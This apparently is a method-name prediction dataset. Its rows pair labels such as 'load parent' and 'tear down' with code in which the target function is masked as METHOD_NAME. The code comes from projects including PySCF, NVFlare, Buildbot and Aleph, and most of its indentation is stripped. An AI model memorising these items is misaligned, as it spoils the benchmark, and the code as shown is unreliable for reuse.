auth_headers_for_superuser,
create_deposit):
owner = users['cms_user']
pid = create_deposit(owner, 'test', publish=True)['_deposit']['id']
resp = client.post('/deposits/{}/actions/edit'.format(pid),
headers=auth_headers_for_superuser)
assert resp.status_code == 201
def test_edit_record_when_other_user_403(client, users, auth_headers_for_user,
create_deposit):
owner, other_user = users['cms_user'], users['cms_user2']
pid = create_deposit(owner, 'test', publish=True)['_deposit']['id']
resp = client.post('/deposits/{}/actions/edit'.format(pid),
headers=auth_headers_for_user(other_user))
assert resp.status_code == 403
def METHOD_NAME(client, create_deposit, users, auth_headers_for_superuser):
owner = users['cms_user']
deposit = create_deposit(owner, 'test', experiment='CMS', publish=True)
metadata = deposit.get_record_metadata()
depid = deposit['_deposit']['id']
resp = client.post('/deposits/{}/actions/edit'.format(depid),
headers=auth_headers_for_superuser)
assert resp.status_code == 201
assert resp.json == {
'id': depid,
'recid': deposit['control_number'],
'type': 'deposit',
'revision': 2,
'schema': {
'fullname': '',
'name': 'test',
'version': '1.0.0'
},
'experiment': 'CMS',
'status': 'draft',
'created_by': {'email': owner.email, 'profile': {}},
'created': metadata.created.strftime('%Y-%m-%dT%H:%M:%S.%f+00:00'),
'updated': metadata.updated.strftime('%Y-%m-%dT%H:%M:%S.%f+00:00'),
'metadata': {},
'labels': [],
'files': [],
'access': {
'deposit-admin': {
'roles': [],
'users': [{'email': owner.email, 'profile': {}}]
},
'deposit-update': {
'roles': [],
'users': [{'email': owner.email, 'profile': {}}]
},
'deposit-read': {
'roles': [],
'users': [{'email': owner.email, 'profile': {}}]
}
},
'is_owner': False,
'links': {
'bucket': 'http://analysispreservation.cern.ch/api/files/{}'.
format(deposit.files.bucket),
'clone': 'http://analysispreservation.cern.ch/api/deposits/{}/actions/clone'
.format(depid),
'discard': 'http://analysispreservation.cern.ch/api/deposits/{}/actions/discard'
.format(depid),
'disconnect_webhook': 'http://analysispreservation.cern.ch/api/deposits/{}/actions/disconnect_webhook'
.format(depid),
'edit': 'http://analysispreservation.cern.ch/api/deposits/{}/actions/edit'
.format(depid),
'files': 'http://analysispreservation.cern.ch/api/deposits/{}/files'
.format(depid),
'html': 'http://analysispreservation.cern.ch/drafts/{}'.format(
depid),
'permissions': 'http://analysispreservation.cern.ch/api/deposits/{}/actions/permissions'
.format(depid),
'publish': 'http://analysispreservation.cern.ch/api/deposits/{}/actions/publish'
.format(depid),
'self': 'http://analysispreservation.cern.ch/api/deposits/{}'.
format(depid),
'upload': 'http://analysispreservation.cern.ch/api/deposits/{}/actions/upload'
.format(depid)
}
} | null |
test finite diff lda partial hess high | #!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy
from pyscf import gto, dft, lib
from pyscf import grad, hessian
def setUpModule():
    global mol, h4
mol = gto.Mole()
mol.verbose = 5
mol.output = '/dev/null'
mol.atom.extend([
["O" , (0. , 0. , 0.)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)] ])
mol.basis = '6-31g'
mol.charge = 1
mol.spin = 1
mol.build()
h4 = gto.Mole()
h4.verbose = 0
h4.atom = [
[1 , (1. , 0. , 0.000)],
[1 , (0. , 1. , 0.000)],
[1 , (0. , -1.517 , 1.177)],
[1 , (0. , 1.517 , 1.177)]]
h4.basis = '631g'
h4.spin = 2
h4.unit = 'B'
h4.build()
def tearDownModule():
global mol, h4
mol.stdout.close()
del mol, h4
def finite_diff(mf):
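    # Reference Hessian: central finite differences of the analytic nuclear
    # gradient (with grid response) with respect to each atomic coordinate.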
mol = mf.mol
mfs = mf.Gradients().set(grid_response=True).as_scanner()
def grad_full(ia, inc):
coord = mol.atom_coord(ia).copy()
ptr = mol._atm[ia,gto.PTR_COORD]
de = []
for i in range(3):
mol._env[ptr+i] = coord[i] + inc
e1a = mfs(mol.copy())[1]
mol._env[ptr+i] = coord[i] - inc
e1b = mfs(mol.copy())[1]
mol._env[ptr+i] = coord[i]
de.append((e1a-e1b)/(2*inc))
return de
natm = mol.natm
e2ref = [grad_full(ia, .5e-3) for ia in range(mol.natm)]
e2ref = numpy.asarray(e2ref).reshape(natm,3,natm,3).transpose(0,2,1,3)
return e2ref
def finite_partial_diff(mf):
# \partial^2 E / \partial R \partial R'
mol = mf.mol
def grad_partial_R(ia, inc):
coord = mol.atom_coord(ia).copy()
ptr = mol._atm[ia,gto.PTR_COORD]
de = []
for i in range(3):
mol._env[ptr+i] = coord[i] + inc
e1a = mf.nuc_grad_method().kernel()
mol._env[ptr+i] = coord[i] - inc
e1b = mf.nuc_grad_method().kernel()
mol._env[ptr+i] = coord[i]
de.append((e1a-e1b)/(2*inc))
return de
natm = mol.natm
e2ref = [grad_partial_R(ia, .5e-3) for ia in range(mol.natm)]
e2ref = numpy.asarray(e2ref).reshape(natm,3,natm,3).transpose(0,2,1,3)
return e2ref
class KnownValues(unittest.TestCase):
def test_finite_diff_lda_hess(self):
mf = dft.UKS(mol)
mf.conv_tol = 1e-14
e0 = mf.kernel()
hess = mf.Hessian().kernel()
self.assertAlmostEqual(lib.fp(hess), -0.8503072107510495, 6)
g_scanner = mf.nuc_grad_method().as_scanner()
pmol = mol.copy()
e1 = g_scanner(pmol.set_geom_('O 0. 0. 0.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
e2 = g_scanner(pmol.set_geom_('O 0. 0. -.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
        #FIXME: errors seem too big
self.assertAlmostEqual(abs(hess[0,:,2] - (e1-e2)/2e-4*lib.param.BOHR).max(), 0, 3)
def test_finite_diff_b3lyp_hess(self):
mf = dft.UKS(mol)
mf.conv_tol = 1e-14
mf.xc = 'b3lyp5'
e0 = mf.kernel()
hess = mf.Hessian().kernel()
self.assertAlmostEqual(lib.fp(hess), -0.8208641727673912, 6)
g_scanner = mf.nuc_grad_method().as_scanner()
pmol = mol.copy()
e1 = g_scanner(pmol.set_geom_('O 0. 0. 0.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
e2 = g_scanner(pmol.set_geom_('O 0. 0. -.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
        #FIXME: errors seem too big
self.assertAlmostEqual(abs(hess[0,:,2] - (e1-e2)/2e-4*lib.param.BOHR).max(), 0, 3)
def test_finite_diff_wb97x_hess(self):
mf = dft.UKS(mol)
mf.conv_tol = 1e-14
mf.xc = 'wb97x'
e0 = mf.kernel()
hess = mf.Hessian().kernel()
self.assertAlmostEqual(lib.fp(hess), -0.8207572641132195, 6)
g_scanner = mf.nuc_grad_method().as_scanner()
pmol = mol.copy()
e1 = g_scanner(pmol.set_geom_('O 0. 0. 0.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
e2 = g_scanner(pmol.set_geom_('O 0. 0. -.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
        #FIXME: errors seem too big
self.assertAlmostEqual(abs(hess[0,:,2] - (e1-e2)/2e-4*lib.param.BOHR).max(), 0, 2)
def test_finite_diff_m06l_hess(self):
mf = dft.UKS(mol)
mf.conv_tol = 1e-14
mf.xc = 'm06l'
# Note MGGA hessian is sensitive to grids level
mf.grids.level = 4
e0 = mf.kernel()
hess = mf.Hessian().kernel()
self.assertAlmostEqual(lib.fp(hess), -0.8108006455574677, 6)
g_scanner = mf.nuc_grad_method().as_scanner()
pmol = mol.copy()
e1 = g_scanner(pmol.set_geom_('O 0. 0. 0.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
e2 = g_scanner(pmol.set_geom_('O 0. 0. -.0001; 1 0. -0.757 0.587; 1 0. 0.757 0.587'))[1]
        #FIXME: errors seem too big
self.assertAlmostEqual(abs(hess[0,:,2] - (e1-e2)/2e-4*lib.param.BOHR).max(), 0, 1)
def test_finite_diff_lda_hess_high_cost(self):
mf = dft.UKS(h4)
mf.grids.level = 4
mf.xc = 'lda,vwn'
mf.conv_tol = 1e-14
mf.kernel()
e2 = mf.Hessian().kernel()
self.assertAlmostEqual(lib.fp(e2), -0.058957876613586674, 3)
e2ref = finite_diff(mf)
self.assertAlmostEqual(abs(e2-e2ref).max(), 0, 4)
def test_finite_diff_b3lyp_hess_high_cost(self):
mf = dft.UKS(h4)
mf.grids.level = 4
mf.xc = 'b3lyp5'
mf.conv_tol = 1e-14
mf.kernel()
e2 = mf.Hessian().kernel()
self.assertAlmostEqual(lib.fp(e2), -0.12571388626848667, 4)
e2ref = finite_diff(mf)
self.assertAlmostEqual(abs(e2-e2ref).max(), 0, 4)
def test_finite_diff_m06l_hess_high_cost(self):
mf = dft.UKS(h4)
mf.grids.level = 4
mf.xc = 'm06l'
mf.conv_tol = 1e-14
mf.kernel()
e2 = mf.Hessian().kernel()
self.assertAlmostEqual(lib.fp(e2), -0.1846235372107723, 3)
e2ref = finite_diff(mf)
        #FIXME: errors seem too big
self.assertAlmostEqual(abs(e2-e2ref).max(), 0, 2)
def METHOD_NAME(self):
mf = dft.UKS(h4)
mf.grids.level = 4
mf.xc = 'lda,vwn'
mf.conv_tol = 1e-14
mf.kernel()
hobj = mf.Hessian()
e2 = hobj.partial_hess_elec(mf.mo_energy, mf.mo_coeff, mf.mo_occ)
e2 += hobj.hess_nuc(h4)
e2ref = finite_partial_diff(mf)
self.assertAlmostEqual(abs(e2-e2ref).max(), 0, 6)
def test_finite_diff_b3lyp_partial_hess_high_cost(self):
mf = dft.UKS(h4)
mf.grids.level = 4
mf.xc = 'b3lyp'
mf.conv_tol = 1e-14
mf.kernel()
hobj = mf.Hessian()
e2 = hobj.partial_hess_elec(mf.mo_energy, mf.mo_coeff, mf.mo_occ)
e2 += hobj.hess_nuc(h4)
e2ref = finite_partial_diff(mf)
self.assertAlmostEqual(abs(e2-e2ref).max(), 0, 6)
def test_finite_diff_m06l_partial_hess_high_cost(self):
mf = dft.UKS(h4)
mf.grids.level = 4
mf.xc = 'm06l'
mf.conv_tol = 1e-14
mf.kernel()
hobj = mf.Hessian()
e2 = hobj.partial_hess_elec(mf.mo_energy, mf.mo_coeff, mf.mo_occ)
e2 += hobj.hess_nuc(h4)
e2ref = finite_partial_diff(mf)
self.assertAlmostEqual(abs(e2-e2ref).max(), 0, 6)
if __name__ == "__main__":
print("Full Tests for UKS Hessian")
unittest.main() | null |
std weekend response | import logging
import random
import sentry_sdk
from os import getenv
from typing import Tuple
import common.dff.integration.condition as int_cnd
import common.dff.integration.context as int_ctx
import common.greeting as common_greeting
import common.scenarios.weekend as common_weekend
from common.constants import CAN_CONTINUE_SCENARIO
from df_engine.core import Actor, Context
sentry_sdk.init(getenv("SENTRY_DSN"))
logger = logging.getLogger(__name__)
LANGUAGE = getenv("LANGUAGE", "EN")
REPLY_TYPE = Tuple[str, float, dict, dict, dict]
DIALOG_BEGINNING_START_CONFIDENCE = 0.98
DIALOG_BEGINNING_CONTINUE_CONFIDENCE = 0.9
DIALOG_BEGINNING_SHORT_ANSWER_CONFIDENCE = 0.98
MIDDLE_DIALOG_START_CONFIDENCE = 0.7
SUPER_CONFIDENCE = 0.98
HIGH_CONFIDENCE = 0.95
MIDDLE_CONFIDENCE = 0.92
GREETING_STEPS = list(common_greeting.GREETING_QUESTIONS[LANGUAGE])
def METHOD_NAME(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.WEEKEND_QUESTIONS)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_START_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_cleaned_up_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
    # obtaining random response from the cleaned-up statements
body = random.choice(common_weekend.CLEANED_UP_STATEMENTS)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_slept_in_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.SLEPT_IN_QUESTIONS)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_START_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_feel_great_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.WHAT_PLANS_FOR_TODAY)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_need_more_time_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.WISH_MORE_TIME)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_watched_film_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.MOVIE_NAME_QUESTION)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_read_book_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.BOOK_NAME_QUESTION)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_played_computer_game_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.COMPUTER_GAME_NAME_QUESTION)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_play_on_weekends_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.GAME_EMOTIONS_QUESTION)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_play_regularly_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.REGULAR_PLAYER_QUESTION)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body])
def sys_play_once_response(ctx: Context, actor: Actor) -> str:
# get ack, body
ack = int_cnd.get_not_used_and_save_sentiment_acknowledgement(ctx, actor, lang=LANGUAGE)
# obtaining random response from weekend questions
body = random.choice(common_weekend.OCCASIONAL_PLAYER_QUESTION)
# set confidence
int_ctx.set_confidence(ctx, actor, DIALOG_BEGINNING_CONTINUE_CONFIDENCE)
int_ctx.set_can_continue(ctx, actor, CAN_CONTINUE_SCENARIO)
int_ctx.add_acknowledgement_to_response_parts(ctx, actor)
return " ".join([ack, body]) | null |
transmit | # Copyright (c) 2023, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
from typing import Optional
from nvflare.fuel.f3.cellnet.core_cell import CoreCell
from nvflare.fuel.f3.cellnet.defs import MessageHeaderKey
from nvflare.fuel.f3.message import Message
from nvflare.fuel.f3.streaming.stream_const import (
STREAM_ACK_TOPIC,
STREAM_CHANNEL,
STREAM_DATA_TOPIC,
StreamDataType,
StreamHeaderKey,
)
from nvflare.fuel.f3.streaming.stream_types import Stream, StreamError, StreamFuture
from nvflare.fuel.f3.streaming.stream_utils import gen_stream_id, stream_thread_pool, wrap_view
STREAM_CHUNK_SIZE = 1024 * 1024
STREAM_WINDOW_SIZE = 16 * STREAM_CHUNK_SIZE
STREAM_ACK_WAIT = 10
log = logging.getLogger(__name__)
class TxTask:
def __init__(self, channel: str, topic: str, target: str, headers: dict, stream: Stream):
self.sid = gen_stream_id()
self.buffer = bytearray(STREAM_CHUNK_SIZE)
# Optimization to send the original buffer without copying
self.direct_buf: Optional[bytes] = None
self.buffer_size = 0
self.channel = channel
self.topic = topic
self.target = target
self.headers = headers
self.stream = stream
self.stream_future = None
self.task_future = None
self.ack_waiter = threading.Event()
self.seq = 0
self.offset = 0
self.offset_ack = 0
def __str__(self):
return f"Tx[SID:{self.sid} to {self.target} for {self.channel}/{self.topic}]"
class ByteStreamer:
def __init__(self, cell: CoreCell):
self.cell = cell
self.cell.register_request_cb(channel=STREAM_CHANNEL, topic=STREAM_ACK_TOPIC, cb=self._ack_handler)
self.tx_task_map = {}
self.map_lock = threading.Lock()
@staticmethod
def get_chunk_size():
return STREAM_CHUNK_SIZE
def send(self, channel: str, topic: str, target: str, headers: dict, stream: Stream) -> StreamFuture:
tx_task = TxTask(channel, topic, target, headers, stream)
with self.map_lock:
self.tx_task_map[tx_task.sid] = tx_task
future = StreamFuture(tx_task.sid)
future.set_size(stream.get_size())
tx_task.stream_future = future
tx_task.task_future = stream_thread_pool.submit(self._transmit_task, tx_task)
return future
def _transmit_task(self, task: TxTask):
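        # Read the stream chunk by chunk, respecting the sliding ACK window,
        # and flush the accumulated buffer whenever it would overflow a chunk.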
while True:
buf = task.stream.read(STREAM_CHUNK_SIZE)
if not buf:
# End of Stream
self.METHOD_NAME(task, final=True)
self._stop_task(task)
return
# Flow control
window = task.offset - task.offset_ack
# It may take several ACKs to clear up the window
while window > STREAM_WINDOW_SIZE:
log.debug(f"{task} window size {window} exceeds limit: {STREAM_WINDOW_SIZE}")
task.ack_waiter.clear()
if not task.ack_waiter.wait(timeout=STREAM_ACK_WAIT):
self._stop_task(task, StreamError(f"{task} ACK timeouts after {STREAM_ACK_WAIT} seconds"))
return
window = task.offset - task.offset_ack
size = len(buf)
if size > STREAM_CHUNK_SIZE:
raise StreamError(f"Stream returns invalid size: {size} for {task}")
if size + task.buffer_size > STREAM_CHUNK_SIZE:
self.METHOD_NAME(task)
if size == STREAM_CHUNK_SIZE:
task.direct_buf = buf
else:
task.buffer[task.buffer_size : task.buffer_size + size] = buf
task.buffer_size += size
def METHOD_NAME(self, task: TxTask, final=False):
if task.buffer_size == 0:
payload = None
elif task.buffer_size == STREAM_CHUNK_SIZE:
if task.direct_buf:
payload = task.direct_buf
else:
payload = task.buffer
else:
payload = wrap_view(task.buffer)[0 : task.buffer_size]
message = Message(None, payload)
if task.offset == 0:
# User headers are only included in the first chunk
if task.headers:
message.add_headers(task.headers)
message.add_headers(
{
StreamHeaderKey.CHANNEL: task.channel,
StreamHeaderKey.TOPIC: task.topic,
StreamHeaderKey.SIZE: task.stream.get_size(),
}
)
message.add_headers(
{
StreamHeaderKey.STREAM_ID: task.sid,
StreamHeaderKey.DATA_TYPE: StreamDataType.FINAL if final else StreamDataType.CHUNK,
StreamHeaderKey.SEQUENCE: task.seq,
StreamHeaderKey.OFFSET: task.offset,
}
)
errors = self.cell.fire_and_forget(STREAM_CHANNEL, STREAM_DATA_TOPIC, task.target, message)
error = errors.get(task.target)
if error:
msg = f"Message sending error to target {task.target}: {error}"
log.debug(msg)
self._stop_task(task, StreamError(msg))
return
# Update state
task.seq += 1
task.offset += task.buffer_size
task.buffer_size = 0
task.direct_buf = None
# Update future
task.stream_future.set_progress(task.offset)
def _stop_task(self, task: TxTask, error: StreamError = None, notify=True):
with self.map_lock:
self.tx_task_map.pop(task.sid, None)
if error:
log.debug(f"Stream error: {error}")
task.stream_future.set_exception(error)
if notify:
message = Message(None, None)
message.add_headers(
{
StreamHeaderKey.STREAM_ID: task.sid,
StreamHeaderKey.DATA_TYPE: StreamDataType.ERROR,
StreamHeaderKey.OFFSET: task.offset,
StreamHeaderKey.ERROR_MSG: str(error),
}
)
self.cell.fire_and_forget(STREAM_CHANNEL, STREAM_DATA_TOPIC, task.target, message)
else:
# Result is the number of bytes streamed
task.stream_future.set_result(task.offset)
def _ack_handler(self, message: Message):
origin = message.get_header(MessageHeaderKey.ORIGIN)
sid = message.get_header(StreamHeaderKey.STREAM_ID)
offset = message.get_header(StreamHeaderKey.OFFSET, None)
with self.map_lock:
task = self.tx_task_map.get(sid, None)
if not task:
# Last few ACKs always arrive late so this is normal
log.debug(f"ACK for stream {sid} received late from {origin} with offset {offset}")
return
error = message.get_header(StreamHeaderKey.ERROR_MSG, None)
if error:
self._stop_task(task, StreamError(f"Received error from {origin}: {error}"), notify=False)
return
if offset > task.offset_ack:
task.offset_ack = offset
if not task.ack_waiter.is_set():
task.ack_waiter.set() | null |
tear down | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from pathlib import Path
from unittest import mock
from twisted.internet import defer
from twisted.python.filepath import FilePath
from twisted.trial import unittest
from buildbot.secrets.providers.passwordstore import SecretInPass
from buildbot.test.fake import fakemaster
from buildbot.test.reactor import TestReactorMixin
from buildbot.test.runprocess import ExpectMasterShell
from buildbot.test.runprocess import MasterRunProcessMixin
from buildbot.test.util.config import ConfigErrorsMixin
class TestSecretInPass(MasterRunProcessMixin, TestReactorMixin, ConfigErrorsMixin,
unittest.TestCase):
@defer.inlineCallbacks
def setUp(self):
self.setup_test_reactor()
self.setup_master_run_process()
self.master = fakemaster.make_master(self)
with mock.patch.object(Path, "is_file", return_value=True):
self.tmp_dir = self.create_temp_dir("temp")
self.srvpass = SecretInPass("password", self.tmp_dir)
yield self.srvpass.setServiceParent(self.master)
yield self.master.startService()
@defer.inlineCallbacks
def METHOD_NAME(self):
yield self.srvpass.stopService()
def create_temp_dir(self, dirname):
tempdir = FilePath(self.mktemp())
tempdir.createDirectory()
return tempdir.path
def test_check_config_secret_in_pass_service(self):
self.assertEqual(self.srvpass.name, "SecretInPass")
env = self.srvpass._env
self.assertEquals(env["PASSWORD_STORE_GPG_OPTS"], "--passphrase password")
self.assertEquals(env["PASSWORD_STORE_DIR"], self.tmp_dir)
def test_check_config_binary_error_secret_in_pass_service(self):
expected_error_msg = "pass does not exist in PATH"
with mock.patch.object(Path, "is_file", return_value=False):
with self.assertRaisesConfigError(expected_error_msg):
self.srvpass.checkConfig("password", "temp")
def test_check_config_directory_error_secret_in_pass_service(self):
expected_error_msg = "directory temp2 does not exist"
with mock.patch.object(Path, "is_file", return_value=True):
with self.assertRaisesConfigError(expected_error_msg):
self.srvpass.checkConfig("password", "temp2")
@defer.inlineCallbacks
def test_reconfig_secret_in_a_file_service(self):
with mock.patch.object(Path, "is_file", return_value=True):
otherdir = self.create_temp_dir("temp2")
yield self.srvpass.reconfigService("password2", otherdir)
self.assertEqual(self.srvpass.name, "SecretInPass")
env = self.srvpass._env
self.assertEquals(env["PASSWORD_STORE_GPG_OPTS"], "--passphrase password2")
self.assertEquals(env["PASSWORD_STORE_DIR"], otherdir)
@defer.inlineCallbacks
def test_get_secret_in_pass(self):
self.expect_commands(
ExpectMasterShell(['pass', 'secret'])
.stdout(b'value')
)
value = yield self.srvpass.get("secret")
self.assertEqual(value, "value")
self.assert_all_commands_ran()
@defer.inlineCallbacks
def test_get_secret_in_pass_multiple_lines_unix(self):
self.expect_commands(
ExpectMasterShell(['pass', 'secret'])
.stdout(b"value1\nvalue2\nvalue3")
)
value = yield self.srvpass.get("secret")
self.assertEqual(value, "value1")
self.assert_all_commands_ran()
@defer.inlineCallbacks
def test_get_secret_in_pass_multiple_lines_darwin(self):
self.expect_commands(
ExpectMasterShell(['pass', 'secret'])
.stdout(b"value1\rvalue2\rvalue3")
)
value = yield self.srvpass.get("secret")
self.assertEqual(value, "value1")
self.assert_all_commands_ran()
@defer.inlineCallbacks
def test_get_secret_in_pass_multiple_lines_windows(self):
self.expect_commands(
ExpectMasterShell(['pass', 'secret'])
.stdout(b"value1\r\nvalue2\r\nvalue3")
)
value = yield self.srvpass.get("secret")
self.assertEqual(value, "value1")
self.assert_all_commands_ran()
@defer.inlineCallbacks
def test_get_secret_in_pass_not_found(self):
self.expect_commands(
ExpectMasterShell(['pass', 'secret'])
.stderr(b"Not found")
)
value = yield self.srvpass.get("secret")
self.assertEqual(value, None) | null |
load parent | import json
import shutil
import logging
from banal import ensure_dict
from flask import Blueprint, request
from tempfile import mkdtemp
from werkzeug.exceptions import BadRequest
from normality import safe_filename, stringify
from servicelayer.archive.util import ensure_path
from aleph.core import db, archive
from aleph.model import Document, Entity, Events
from aleph.queues import ingest_entity
from aleph.index.entities import index_proxy
from aleph.logic.documents import ingest_flush
from aleph.logic.notifications import publish, channel_tag
from aleph.views.util import get_db_collection, get_flag
from aleph.views.util import jsonify, validate, get_session_id
log = logging.getLogger(__name__)
blueprint = Blueprint("ingest_api", __name__)
def METHOD_NAME(collection, meta):
"""Determine the parent document for the document that is to be
ingested."""
parent = ensure_dict(meta.get("parent"))
parent_id = meta.get("parent_id", parent.get("id"))
if parent_id is None:
return
parent = Document.by_id(parent_id, collection=collection)
if parent is None:
raise BadRequest(
response=jsonify(
{"status": "error", "message": "Cannot load parent document"},
status=400,
)
)
return parent
def _load_metadata():
"""Unpack the common, pre-defined metadata for all the uploaded files."""
try:
meta = json.loads(request.form.get("meta", "{}"))
except Exception as ex:
raise BadRequest(str(ex))
validate(meta, "DocumentIngest")
foreign_id = stringify(meta.get("foreign_id"))
if not len(request.files) and foreign_id is None:
raise BadRequest(
response=jsonify(
{"status": "error", "message": "Directories need to have a foreign_id"},
status=400,
)
)
return meta, foreign_id
def _notify(collection, document_id):
if not collection.casefile:
return
channels = [
channel_tag(document_id, Entity),
channel_tag(collection),
]
params = {"collection": collection, "document": document_id}
publish(
Events.INGEST_DOCUMENT,
params=params,
channels=channels,
actor_id=request.authz.id,
)
@blueprint.route("/<int:collection_id>/ingest", methods=["POST", "PUT"])
def ingest_upload(collection_id):
"""
---
post:
summary: Upload a document to a collection
description: Upload a document to a collection with id `collection_id`
parameters:
- in: path
name: collection_id
required: true
schema:
type: integer
requestBody:
content:
multipart/form-data:
schema:
type: object
properties:
file:
type: string
format: binary
description: The document to upload
meta:
$ref: '#/components/schemas/DocumentIngest'
responses:
'200':
description: OK
content:
application/json:
schema:
properties:
id:
description: id of the uploaded document
type: integer
status:
type: string
type: object
tags:
- Ingest
- Collection
"""
collection = get_db_collection(collection_id, request.authz.WRITE)
job_id = get_session_id()
sync = get_flag("sync", default=False)
index = get_flag("index", default=True)
meta, foreign_id = _load_metadata()
parent = METHOD_NAME(collection, meta)
upload_dir = ensure_path(mkdtemp(prefix="aleph.upload."))
try:
content_hash = None
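        # Store every uploaded file in the archive; the content hash of the
        # last archived file is attached to the new document.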
